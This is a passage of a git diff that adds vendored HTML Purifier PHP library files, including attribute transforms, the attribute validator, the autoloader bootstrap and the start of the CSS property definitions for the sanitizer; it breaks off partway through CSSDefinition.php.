000000000..fd84c10c3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ImgSpace.php @@ -0,0 +1,44 @@ +<?php + +/** + * Pre-transform that changes deprecated hspace and vspace attributes to CSS + */ +class HTMLPurifier_AttrTransform_ImgSpace extends HTMLPurifier_AttrTransform { + + protected $attr; + protected $css = array( + 'hspace' => array('left', 'right'), + 'vspace' => array('top', 'bottom') + ); + + public function __construct($attr) { + $this->attr = $attr; + if (!isset($this->css[$attr])) { + trigger_error(htmlspecialchars($attr) . ' is not valid space attribute'); + } + } + + public function transform($attr, $config, $context) { + + if (!isset($attr[$this->attr])) return $attr; + + $width = $this->confiscateAttr($attr, $this->attr); + // some validation could happen here + + if (!isset($this->css[$this->attr])) return $attr; + + $style = ''; + foreach ($this->css[$this->attr] as $suffix) { + $property = "margin-$suffix"; + $style .= "$property:{$width}px;"; + } + + $this->prependCSS($attr, $style); + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Input.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Input.php new file mode 100644 index 000000000..16829552d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Input.php @@ -0,0 +1,40 @@ +<?php + +/** + * Performs miscellaneous cross attribute validation and filtering for + * input elements. This is meant to be a post-transform. + */ +class HTMLPurifier_AttrTransform_Input extends HTMLPurifier_AttrTransform { + + protected $pixels; + + public function __construct() { + $this->pixels = new HTMLPurifier_AttrDef_HTML_Pixels(); + } + + public function transform($attr, $config, $context) { + if (!isset($attr['type'])) $t = 'text'; + else $t = strtolower($attr['type']); + if (isset($attr['checked']) && $t !== 'radio' && $t !== 'checkbox') { + unset($attr['checked']); + } + if (isset($attr['maxlength']) && $t !== 'text' && $t !== 'password') { + unset($attr['maxlength']); + } + if (isset($attr['size']) && $t !== 'text' && $t !== 'password') { + $result = $this->pixels->validate($attr['size'], $config, $context); + if ($result === false) unset($attr['size']); + else $attr['size'] = $result; + } + if (isset($attr['src']) && $t !== 'image') { + unset($attr['src']); + } + if (!isset($attr['value']) && ($t === 'radio' || $t === 'checkbox')) { + $attr['value'] = ''; + } + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Lang.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Lang.php new file mode 100644 index 000000000..5869e7f82 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Lang.php @@ -0,0 +1,28 @@ +<?php + +/** + * Post-transform that copies lang's value to xml:lang (and vice-versa) + * @note Theoretically speaking, this could be a pre-transform, but putting + * post is more efficient. + */ +class HTMLPurifier_AttrTransform_Lang extends HTMLPurifier_AttrTransform +{ + + public function transform($attr, $config, $context) { + + $lang = isset($attr['lang']) ? $attr['lang'] : false; + $xml_lang = isset($attr['xml:lang']) ? $attr['xml:lang'] : false; + + if ($lang !== false && $xml_lang === false) { + $attr['xml:lang'] = $lang; + } elseif ($xml_lang !== false) { + $attr['lang'] = $xml_lang; + } + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Length.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Length.php new file mode 100644 index 000000000..ea2f30473 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Length.php @@ -0,0 +1,27 @@ +<?php + +/** + * Class for handling width/height length attribute transformations to CSS + */ +class HTMLPurifier_AttrTransform_Length extends HTMLPurifier_AttrTransform +{ + + protected $name; + protected $cssName; + + public function __construct($name, $css_name = null) { + $this->name = $name; + $this->cssName = $css_name ? $css_name : $name; + } + + public function transform($attr, $config, $context) { + if (!isset($attr[$this->name])) return $attr; + $length = $this->confiscateAttr($attr, $this->name); + if(ctype_digit($length)) $length .= 'px'; + $this->prependCSS($attr, $this->cssName . ":$length;"); + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Name.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Name.php new file mode 100644 index 000000000..15315bc73 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Name.php @@ -0,0 +1,21 @@ +<?php + +/** + * Pre-transform that changes deprecated name attribute to ID if necessary + */ +class HTMLPurifier_AttrTransform_Name extends HTMLPurifier_AttrTransform +{ + + public function transform($attr, $config, $context) { + // Abort early if we're using relaxed definition of name + if ($config->get('HTML.Attr.Name.UseCDATA')) return $attr; + if (!isset($attr['name'])) return $attr; + $id = $this->confiscateAttr($attr, 'name'); + if ( isset($attr['id'])) return $attr; + $attr['id'] = $id; + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/NameSync.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/NameSync.php new file mode 100644 index 000000000..a95638c14 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/NameSync.php @@ -0,0 +1,27 @@ +<?php + +/** + * Post-transform that performs validation to the name attribute; if + * it is present with an equivalent id attribute, it is passed through; + * otherwise validation is performed. + */ +class HTMLPurifier_AttrTransform_NameSync extends HTMLPurifier_AttrTransform +{ + + public function __construct() { + $this->idDef = new HTMLPurifier_AttrDef_HTML_ID(); + } + + public function transform($attr, $config, $context) { + if (!isset($attr['name'])) return $attr; + $name = $attr['name']; + if (isset($attr['id']) && $attr['id'] === $name) return $attr; + $result = $this->idDef->validate($name, $config, $context); + if ($result === false) unset($attr['name']); + else $attr['name'] = $result; + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Nofollow.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Nofollow.php new file mode 100644 index 000000000..f7fb1209b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Nofollow.php @@ -0,0 +1,45 @@ +<?php + +// must be called POST validation + +/** + * Adds rel="nofollow" to all outbound links. This transform is + * only attached if Attr.Nofollow is TRUE. + */ +class HTMLPurifier_AttrTransform_Nofollow extends HTMLPurifier_AttrTransform +{ + private $parser; + + public function __construct() { + $this->parser = new HTMLPurifier_URIParser(); + } + + public function transform($attr, $config, $context) { + + if (!isset($attr['href'])) { + return $attr; + } + + // XXX Kind of inefficient + $url = $this->parser->parse($attr['href']); + $scheme = $url->getSchemeObj($config, $context); + + if ($scheme->browsable && !$url->isLocal($config, $context)) { + if (isset($attr['rel'])) { + $rels = explode(' ', $attr); + if (!in_array('nofollow', $rels)) { + $rels[] = 'nofollow'; + } + $attr['rel'] = implode(' ', $rels); + } else { + $attr['rel'] = 'nofollow'; + } + } + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeEmbed.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeEmbed.php new file mode 100644 index 000000000..4da449981 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeEmbed.php @@ -0,0 +1,15 @@ +<?php + +class HTMLPurifier_AttrTransform_SafeEmbed extends HTMLPurifier_AttrTransform +{ + public $name = "SafeEmbed"; + + public function transform($attr, $config, $context) { + $attr['allowscriptaccess'] = 'never'; + $attr['allownetworking'] = 'internal'; + $attr['type'] = 'application/x-shockwave-flash'; + return $attr; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeObject.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeObject.php new file mode 100644 index 000000000..1ed74898b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeObject.php @@ -0,0 +1,16 @@ +<?php + +/** + * Writes default type for all objects. Currently only supports flash. + */ +class HTMLPurifier_AttrTransform_SafeObject extends HTMLPurifier_AttrTransform +{ + public $name = "SafeObject"; + + function transform($attr, $config, $context) { + if (!isset($attr['type'])) $attr['type'] = 'application/x-shockwave-flash'; + return $attr; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeParam.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeParam.php new file mode 100644 index 000000000..bd86a7455 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/SafeParam.php @@ -0,0 +1,64 @@ +<?php + +/** + * Validates name/value pairs in param tags to be used in safe objects. This + * will only allow name values it recognizes, and pre-fill certain attributes + * with required values. + * + * @note + * This class only supports Flash. In the future, Quicktime support + * may be added. + * + * @warning + * This class expects an injector to add the necessary parameters tags. + */ +class HTMLPurifier_AttrTransform_SafeParam extends HTMLPurifier_AttrTransform +{ + public $name = "SafeParam"; + private $uri; + + public function __construct() { + $this->uri = new HTMLPurifier_AttrDef_URI(true); // embedded + $this->wmode = new HTMLPurifier_AttrDef_Enum(array('window', 'opaque', 'transparent')); + } + + public function transform($attr, $config, $context) { + // If we add support for other objects, we'll need to alter the + // transforms. + switch ($attr['name']) { + // application/x-shockwave-flash + // Keep this synchronized with Injector/SafeObject.php + case 'allowScriptAccess': + $attr['value'] = 'never'; + break; + case 'allowNetworking': + $attr['value'] = 'internal'; + break; + case 'allowFullScreen': + if ($config->get('HTML.FlashAllowFullScreen')) { + $attr['value'] = ($attr['value'] == 'true') ? 'true' : 'false'; + } else { + $attr['value'] = 'false'; + } + break; + case 'wmode': + $attr['value'] = $this->wmode->validate($attr['value'], $config, $context); + break; + case 'movie': + case 'src': + $attr['name'] = "movie"; + $attr['value'] = $this->uri->validate($attr['value'], $config, $context); + break; + case 'flashvars': + // we're going to allow arbitrary inputs to the SWF, on + // the reasoning that it could only hack the SWF, not us. + break; + // add other cases to support other param name/value pairs + default: + $attr['name'] = $attr['value'] = null; + } + return $attr; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ScriptRequired.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ScriptRequired.php new file mode 100644 index 000000000..4499050a2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/ScriptRequired.php @@ -0,0 +1,16 @@ +<?php + +/** + * Implements required attribute stipulation for <script> + */ +class HTMLPurifier_AttrTransform_ScriptRequired extends HTMLPurifier_AttrTransform +{ + public function transform($attr, $config, $context) { + if (!isset($attr['type'])) { + $attr['type'] = 'text/javascript'; + } + return $attr; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/TargetBlank.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/TargetBlank.php new file mode 100644 index 000000000..a6502c749 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/TargetBlank.php @@ -0,0 +1,38 @@ +<?php + +// must be called POST validation + +/** + * Adds target="blank" to all outbound links. This transform is + * only attached if Attr.TargetBlank is TRUE. This works regardless + * of whether or not Attr.AllowedFrameTargets + */ +class HTMLPurifier_AttrTransform_TargetBlank extends HTMLPurifier_AttrTransform +{ + private $parser; + + public function __construct() { + $this->parser = new HTMLPurifier_URIParser(); + } + + public function transform($attr, $config, $context) { + + if (!isset($attr['href'])) { + return $attr; + } + + // XXX Kind of inefficient + $url = $this->parser->parse($attr['href']); + $scheme = $url->getSchemeObj($config, $context); + + if ($scheme->browsable && !$url->isBenign($config, $context)) { + $attr['target'] = 'blank'; + } + + return $attr; + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Textarea.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Textarea.php new file mode 100644 index 000000000..81ac3488b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTransform/Textarea.php @@ -0,0 +1,18 @@ +<?php + +/** + * Sets height/width defaults for <textarea> + */ +class HTMLPurifier_AttrTransform_Textarea extends HTMLPurifier_AttrTransform +{ + + public function transform($attr, $config, $context) { + // Calculated from Firefox + if (!isset($attr['cols'])) $attr['cols'] = '22'; + if (!isset($attr['rows'])) $attr['rows'] = '3'; + return $attr; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrTypes.php b/lib/htmlpurifier/library/HTMLPurifier/AttrTypes.php new file mode 100644 index 000000000..6f985ff93 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrTypes.php @@ -0,0 +1,91 @@ +<?php + +/** + * Provides lookup array of attribute types to HTMLPurifier_AttrDef objects + */ +class HTMLPurifier_AttrTypes +{ + /** + * Lookup array of attribute string identifiers to concrete implementations + */ + protected $info = array(); + + /** + * Constructs the info array, supplying default implementations for attribute + * types. + */ + public function __construct() { + // XXX This is kind of poor, since we don't actually /clone/ + // instances; instead, we use the supplied make() attribute. So, + // the underlying class must know how to deal with arguments. + // With the old implementation of Enum, that ignored its + // arguments when handling a make dispatch, the IAlign + // definition wouldn't work. + + // pseudo-types, must be instantiated via shorthand + $this->info['Enum'] = new HTMLPurifier_AttrDef_Enum(); + $this->info['Bool'] = new HTMLPurifier_AttrDef_HTML_Bool(); + + $this->info['CDATA'] = new HTMLPurifier_AttrDef_Text(); + $this->info['ID'] = new HTMLPurifier_AttrDef_HTML_ID(); + $this->info['Length'] = new HTMLPurifier_AttrDef_HTML_Length(); + $this->info['MultiLength'] = new HTMLPurifier_AttrDef_HTML_MultiLength(); + $this->info['NMTOKENS'] = new HTMLPurifier_AttrDef_HTML_Nmtokens(); + $this->info['Pixels'] = new HTMLPurifier_AttrDef_HTML_Pixels(); + $this->info['Text'] = new HTMLPurifier_AttrDef_Text(); + $this->info['URI'] = new HTMLPurifier_AttrDef_URI(); + $this->info['LanguageCode'] = new HTMLPurifier_AttrDef_Lang(); + $this->info['Color'] = new HTMLPurifier_AttrDef_HTML_Color(); + $this->info['IAlign'] = self::makeEnum('top,middle,bottom,left,right'); + $this->info['LAlign'] = self::makeEnum('top,bottom,left,right'); + $this->info['FrameTarget'] = new HTMLPurifier_AttrDef_HTML_FrameTarget(); + + // unimplemented aliases + $this->info['ContentType'] = new HTMLPurifier_AttrDef_Text(); + $this->info['ContentTypes'] = new HTMLPurifier_AttrDef_Text(); + $this->info['Charsets'] = new HTMLPurifier_AttrDef_Text(); + $this->info['Character'] = new HTMLPurifier_AttrDef_Text(); + + // "proprietary" types + $this->info['Class'] = new HTMLPurifier_AttrDef_HTML_Class(); + + // number is really a positive integer (one or more digits) + // FIXME: ^^ not always, see start and value of list items + $this->info['Number'] = new HTMLPurifier_AttrDef_Integer(false, false, true); + } + + private static function makeEnum($in) { + return new HTMLPurifier_AttrDef_Clone(new HTMLPurifier_AttrDef_Enum(explode(',', $in))); + } + + /** + * Retrieves a type + * @param $type String type name + * @return Object AttrDef for type + */ + public function get($type) { + + // determine if there is any extra info tacked on + if (strpos($type, '#') !== false) list($type, $string) = explode('#', $type, 2); + else $string = ''; + + if (!isset($this->info[$type])) { + trigger_error('Cannot retrieve undefined attribute type ' . $type, E_USER_ERROR); + return; + } + + return $this->info[$type]->make($string); + + } + + /** + * Sets a new implementation for a type + * @param $type String type name + * @param $impl Object AttrDef for type + */ + public function set($type, $impl) { + $this->info[$type] = $impl; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/AttrValidator.php b/lib/htmlpurifier/library/HTMLPurifier/AttrValidator.php new file mode 100644 index 000000000..829a0f8f2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/AttrValidator.php @@ -0,0 +1,162 @@ +<?php + +/** + * Validates the attributes of a token. Doesn't manage required attributes + * very well. The only reason we factored this out was because RemoveForeignElements + * also needed it besides ValidateAttributes. + */ +class HTMLPurifier_AttrValidator +{ + + /** + * Validates the attributes of a token, returning a modified token + * that has valid tokens + * @param $token Reference to token to validate. We require a reference + * because the operation this class performs on the token are + * not atomic, so the context CurrentToken to be updated + * throughout + * @param $config Instance of HTMLPurifier_Config + * @param $context Instance of HTMLPurifier_Context + */ + public function validateToken(&$token, &$config, $context) { + + $definition = $config->getHTMLDefinition(); + $e =& $context->get('ErrorCollector', true); + + // initialize IDAccumulator if necessary + $ok =& $context->get('IDAccumulator', true); + if (!$ok) { + $id_accumulator = HTMLPurifier_IDAccumulator::build($config, $context); + $context->register('IDAccumulator', $id_accumulator); + } + + // initialize CurrentToken if necessary + $current_token =& $context->get('CurrentToken', true); + if (!$current_token) $context->register('CurrentToken', $token); + + if ( + !$token instanceof HTMLPurifier_Token_Start && + !$token instanceof HTMLPurifier_Token_Empty + ) return $token; + + // create alias to global definition array, see also $defs + // DEFINITION CALL + $d_defs = $definition->info_global_attr; + + // don't update token until the very end, to ensure an atomic update + $attr = $token->attr; + + // do global transformations (pre) + // nothing currently utilizes this + foreach ($definition->info_attr_transform_pre as $transform) { + $attr = $transform->transform($o = $attr, $config, $context); + if ($e) { + if ($attr != $o) $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr); + } + } + + // do local transformations only applicable to this element (pre) + // ex. <p align="right"> to <p style="text-align:right;"> + foreach ($definition->info[$token->name]->attr_transform_pre as $transform) { + $attr = $transform->transform($o = $attr, $config, $context); + if ($e) { + if ($attr != $o) $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr); + } + } + + // create alias to this element's attribute definition array, see + // also $d_defs (global attribute definition array) + // DEFINITION CALL + $defs = $definition->info[$token->name]->attr; + + $attr_key = false; + $context->register('CurrentAttr', $attr_key); + + // iterate through all the attribute keypairs + // Watch out for name collisions: $key has previously been used + foreach ($attr as $attr_key => $value) { + + // call the definition + if ( isset($defs[$attr_key]) ) { + // there is a local definition defined + if ($defs[$attr_key] === false) { + // We've explicitly been told not to allow this element. + // This is usually when there's a global definition + // that must be overridden. + // Theoretically speaking, we could have a + // AttrDef_DenyAll, but this is faster! + $result = false; + } else { + // validate according to the element's definition + $result = $defs[$attr_key]->validate( + $value, $config, $context + ); + } + } elseif ( isset($d_defs[$attr_key]) ) { + // there is a global definition defined, validate according + // to the global definition + $result = $d_defs[$attr_key]->validate( + $value, $config, $context + ); + } else { + // system never heard of the attribute? DELETE! + $result = false; + } + + // put the results into effect + if ($result === false || $result === null) { + // this is a generic error message that should replaced + // with more specific ones when possible + if ($e) $e->send(E_ERROR, 'AttrValidator: Attribute removed'); + + // remove the attribute + unset($attr[$attr_key]); + } elseif (is_string($result)) { + // generally, if a substitution is happening, there + // was some sort of implicit correction going on. We'll + // delegate it to the attribute classes to say exactly what. + + // simple substitution + $attr[$attr_key] = $result; + } else { + // nothing happens + } + + // we'd also want slightly more complicated substitution + // involving an array as the return value, + // although we're not sure how colliding attributes would + // resolve (certain ones would be completely overriden, + // others would prepend themselves). + } + + $context->destroy('CurrentAttr'); + + // post transforms + + // global (error reporting untested) + foreach ($definition->info_attr_transform_post as $transform) { + $attr = $transform->transform($o = $attr, $config, $context); + if ($e) { + if ($attr != $o) $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr); + } + } + + // local (error reporting untested) + foreach ($definition->info[$token->name]->attr_transform_post as $transform) { + $attr = $transform->transform($o = $attr, $config, $context); + if ($e) { + if ($attr != $o) $e->send(E_NOTICE, 'AttrValidator: Attributes transformed', $o, $attr); + } + } + + $token->attr = $attr; + + // destroy CurrentToken if we made it ourselves + if (!$current_token) $context->destroy('CurrentToken'); + + } + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Bootstrap.php b/lib/htmlpurifier/library/HTMLPurifier/Bootstrap.php new file mode 100644 index 000000000..607c5b188 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Bootstrap.php @@ -0,0 +1,104 @@ +<?php + +// constants are slow, so we use as few as possible +if (!defined('HTMLPURIFIER_PREFIX')) { + define('HTMLPURIFIER_PREFIX', realpath(dirname(__FILE__) . '/..')); +} + +// accomodations for versions earlier than 5.0.2 +// borrowed from PHP_Compat, LGPL licensed, by Aidan Lister <aidan@php.net> +if (!defined('PHP_EOL')) { + switch (strtoupper(substr(PHP_OS, 0, 3))) { + case 'WIN': + define('PHP_EOL', "\r\n"); + break; + case 'DAR': + define('PHP_EOL', "\r"); + break; + default: + define('PHP_EOL', "\n"); + } +} + +/** + * Bootstrap class that contains meta-functionality for HTML Purifier such as + * the autoload function. + * + * @note + * This class may be used without any other files from HTML Purifier. + */ +class HTMLPurifier_Bootstrap +{ + + /** + * Autoload function for HTML Purifier + * @param $class Class to load + */ + public static function autoload($class) { + $file = HTMLPurifier_Bootstrap::getPath($class); + if (!$file) return false; + // Technically speaking, it should be ok and more efficient to + // just do 'require', but Antonio Parraga reports that with + // Zend extensions such as Zend debugger and APC, this invariant + // may be broken. Since we have efficient alternatives, pay + // the cost here and avoid the bug. + require_once HTMLPURIFIER_PREFIX . '/' . $file; + return true; + } + + /** + * Returns the path for a specific class. + */ + public static function getPath($class) { + if (strncmp('HTMLPurifier', $class, 12) !== 0) return false; + // Custom implementations + if (strncmp('HTMLPurifier_Language_', $class, 22) === 0) { + $code = str_replace('_', '-', substr($class, 22)); + $file = 'HTMLPurifier/Language/classes/' . $code . '.php'; + } else { + $file = str_replace('_', '/', $class) . '.php'; + } + if (!file_exists(HTMLPURIFIER_PREFIX . '/' . $file)) return false; + return $file; + } + + /** + * "Pre-registers" our autoloader on the SPL stack. + */ + public static function registerAutoload() { + $autoload = array('HTMLPurifier_Bootstrap', 'autoload'); + if ( ($funcs = spl_autoload_functions()) === false ) { + spl_autoload_register($autoload); + } elseif (function_exists('spl_autoload_unregister')) { + $buggy = version_compare(PHP_VERSION, '5.2.11', '<'); + $compat = version_compare(PHP_VERSION, '5.1.2', '<=') && + version_compare(PHP_VERSION, '5.1.0', '>='); + foreach ($funcs as $func) { + if ($buggy && is_array($func)) { + // :TRICKY: There are some compatibility issues and some + // places where we need to error out + $reflector = new ReflectionMethod($func[0], $func[1]); + if (!$reflector->isStatic()) { + throw new Exception(' + HTML Purifier autoloader registrar is not compatible + with non-static object methods due to PHP Bug #44144; + Please do not use HTMLPurifier.autoload.php (or any + file that includes this file); instead, place the code: + spl_autoload_register(array(\'HTMLPurifier_Bootstrap\', \'autoload\')) + after your own autoloaders. + '); + } + // Suprisingly, spl_autoload_register supports the + // Class::staticMethod callback format, although call_user_func doesn't + if ($compat) $func = implode('::', $func); + } + spl_autoload_unregister($func); + } + spl_autoload_register($autoload); + foreach ($funcs as $func) spl_autoload_register($func); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/CSSDefinition.php b/lib/htmlpurifier/library/HTMLPurifier/CSSDefinition.php new file mode 100644 index 000000000..91619f5d3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/CSSDefinition.php @@ -0,0 +1,322 @@ +<?php + +/** + * Defines allowed CSS attributes and what their values are. + * @see HTMLPurifier_HTMLDefinition + */ +class HTMLPurifier_CSSDefinition extends HTMLPurifier_Definition +{ + + public $type = 'CSS'; + + /** + * Assoc array of attribute name to definition object. + */ + public $info = array(); + + /** + * Constructs the info array. The meat of this class. + */ + protected function doSetup($config) { + + $this->info['text-align'] = new HTMLPurifier_AttrDef_Enum( + array('left', 'right', 'center', 'justify'), false); + + $border_style = + $this->info['border-bottom-style'] = + $this->info['border-right-style'] = + $this->info['border-left-style'] = + $this->info['border-top-style'] = new HTMLPurifier_AttrDef_Enum( + array('none', 'hidden', 'dotted', 'dashed', 'solid', 'double', + 'groove', 'ridge', 'inset', 'outset'), false); + + $this->info['border-style'] = new HTMLPurifier_AttrDef_CSS_Multiple($border_style); + + $this->info['clear'] = new HTMLPurifier_AttrDef_Enum( + array('none', 'left', 'right', 'both'), false); + $this->info['float'] = new HTMLPurifier_AttrDef_Enum( + array('none', 'left', 'right'), false); + $this->info['font-style'] = new HTMLPurifier_AttrDef_Enum( + array('normal', 'italic', 'oblique'), false); + $this->info['font-variant'] = new HTMLPurifier_AttrDef_Enum( + array('normal', 'small-caps'), false); + + $uri_or_none = new HTMLPurifier_AttrDef_CSS_Composite( + array( + new HTMLPurifier_AttrDef_Enum(array('none')), + new HTMLPurifier_AttrDef_CSS_URI() + ) + ); + + $this->info['list-style-position'] = new HTMLPurifier_AttrDef_Enum( + array('inside', 'outside'), false); + $this->info['list-style-type'] = new HTMLPurifier_AttrDef_Enum( + array('disc', 'circle', 'square', 'decimal', 'lower-roman', + 'upper-roman', 'lower-alpha', 'upper-alpha', 'none'), false); + $this->info['list-style-image'] = $uri_or_none; + + $this->info['list-style'] = new HTMLPurifier_AttrDef_CSS_ListStyle($config); + + $this->info['text-transform'] = new HTMLPurifier_AttrDef_Enum( + array('capitalize', 'uppercase', 'lowercase', 'none'), false); + $this->info['color'] = new HTMLPurifier_AttrDef_CSS_Color(); + + $this->info['background-image'] = $uri_or_none; + $this->info['background-repeat'] = new HTMLPurifier_AttrDef_Enum( + array('repeat', 'repeat-x', 'repeat-y', 'no-repeat') + ); + $this->info['background-attachment'] = new HTMLPurifier_AttrDef_Enum( + array('scroll', 'fixed') + ); + $this->info['background-position'] = new HTMLPurifier_AttrDef_CSS_BackgroundPosition(); + + $border_color = + $this->info['border-top-color'] = + $this->info['border-bottom-color'] = + $this->info['border-left-color'] = + $this->info['border-right-color'] = + $this->info['background-color'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('transparent')), + new HTMLPurifier_AttrDef_CSS_Color() + )); + + $this->info['background'] = new HTMLPurifier_AttrDef_CSS_Background($config); + + $this->info['border-color'] = new HTMLPurifier_AttrDef_CSS_Multiple($border_color); + + $border_width = + $this->info['border-top-width'] = + $this->info['border-bottom-width'] = + $this->info['border-left-width'] = + $this->info['border-right-width'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('thin', 'medium', 'thick')), + new HTMLPurifier_AttrDef_CSS_Length('0') //disallow negative + )); + + $this->info['border-width'] = new HTMLPurifier_AttrDef_CSS_Multiple($border_width); + + $this->info['letter-spacing'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('normal')), + new HTMLPurifier_AttrDef_CSS_Length() + )); + + $this->info['word-spacing'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('normal')), + new HTMLPurifier_AttrDef_CSS_Length() + )); + + $this->info['font-size'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('xx-small', 'x-small', + 'small', 'medium', 'large', 'x-large', 'xx-large', + 'larger', 'smaller')), + new HTMLPurifier_AttrDef_CSS_Percentage(), + new HTMLPurifier_AttrDef_CSS_Length() + )); + + $this->info['line-height'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_Enum(array('normal')), + new HTMLPurifier_AttrDef_CSS_Number(true), // no negatives + new HTMLPurifier_AttrDef_CSS_Length('0'), + new HTMLPurifier_AttrDef_CSS_Percentage(true) + )); + + $margin = + $this->info['margin-top'] = + $this->info['margin-bottom'] = + $this->info['margin-left'] = + $this->info['margin-right'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length(), + new HTMLPurifier_AttrDef_CSS_Percentage(), + new HTMLPurifier_AttrDef_Enum(array('auto')) + )); + + $this->info['margin'] = new HTMLPurifier_AttrDef_CSS_Multiple($margin); + + // non-negative + $padding = + $this->info['padding-top'] = + $this->info['padding-bottom'] = + $this->info['padding-left'] = + $this->info['padding-right'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length('0'), + new HTMLPurifier_AttrDef_CSS_Percentage(true) + )); + + $this->info['padding'] = new HTMLPurifier_AttrDef_CSS_Multiple($padding); + + $this->info['text-indent'] = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length(), + new HTMLPurifier_AttrDef_CSS_Percentage() + )); + + $trusted_wh = new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length('0'), + new HTMLPurifier_AttrDef_CSS_Percentage(true), + new HTMLPurifier_AttrDef_Enum(array('auto')) + )); + $max = $config->get('CSS.MaxImgLength'); + + $this->info['width'] = + $this->info['height'] = + $max === null ? + $trusted_wh : + new HTMLPurifier_AttrDef_Switch('img', + // For img tags: + new HTMLPurifier_AttrDef_CSS_Composite(array( + new HTMLPurifier_AttrDef_CSS_Length('0', $max), + new HTMLPurifier_AttrDef_Enum(array('auto')) + )), + // For everyone else: + $trusted_wh + ); + + $this->info['text-decoration'] = new HTMLPurifier_AttrDef_CSS_TextDecoration(); + + $this->info['font-family'] = new HTMLPurifier_AttrDef_CSS_FontFamily(); + + // this could use specialized code + $this->info['font-weight'] = new HTMLPurifier_AttrDef_Enum( + array('normal', 'bold', 'bolder', 'lighter', '100', '200', '300', + '400', '500', '600', '700', '800', '900'), false); + + // MUST be called after other font properties, as it references + // a CSSDefinition object + $this->info['font'] = new HTMLPurifier_AttrDef_CSS_Font($config); + + // same here + $this->info['border'] = + $this->info['border-bottom'] = + $this->info['border-top'] = + $this->info['border-left'] = + $this->info['border-right'] = new HTMLPurifier_AttrDef_CSS_Border($config); + + $this->info['border-collapse'] = new HTMLPurifier_AttrDef_Enum(array( + 'collapse', 'separate')); + + $this->info['caption-side'] = new HTMLPurifier_AttrDef_Enum(array( + 